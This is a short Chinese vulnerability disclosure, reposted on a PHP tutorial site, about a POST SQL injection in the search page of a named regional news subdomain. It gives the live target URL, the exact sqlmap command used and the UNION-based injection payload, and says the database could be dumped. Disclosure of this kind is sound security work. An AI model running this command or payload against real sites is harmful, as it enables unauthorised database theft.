中安在线某分站POST注入 - 网站安全

中安在线某分站POST注入 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-15 15:00 作者：阅读:次

[导读] 搜索页面 post 注入，可以脱裤。存在post注入页面 http: wswz anhuinews com search html简单用rsquo;测试发现存在注入漏洞 firfox=firebug=查看搜索框value值 keyword请出sqlmap语句如下：python s...

搜索页面 post 注入，可以脱裤。存在post注入页面 http://wswz.anhuinews.com/search.html

简单用’测试发现存在注入漏洞

firfox=>firebug=>查看搜索框value值 keyword

请出sqlmap

语句如下：python sqlmap.py -u http://wswz.anhuinews.com/search.html --data="keyword=1" --dbs

跑出很多表

Payload: keyword=-9017%' UNION ALL SELECT 80,80,80,80,80,80,CHAR(113)+CHAR(1

18)+CHAR(100)+CHAR(122)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(97)+CHAR(115)+CHAR(107)

+CHAR(111)+CHAR(82)+CHAR(69)+CHAR(121)+CHAR(109)+CHAR(113)+CHAR(102)+CHAR(109)+C

HAR(99)+CHAR(113),80,80,80,80,80--

可脱裤，我就不继续了。

修复方案：

过滤，交给专业黑客安全人士来做吧。

189.cn某分站任意Url跳转 - 网站安全 - 自学php

建站之星用户中心设计不当可操作任意站点 - 网

子栏目

中安在线某分站POST注入 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论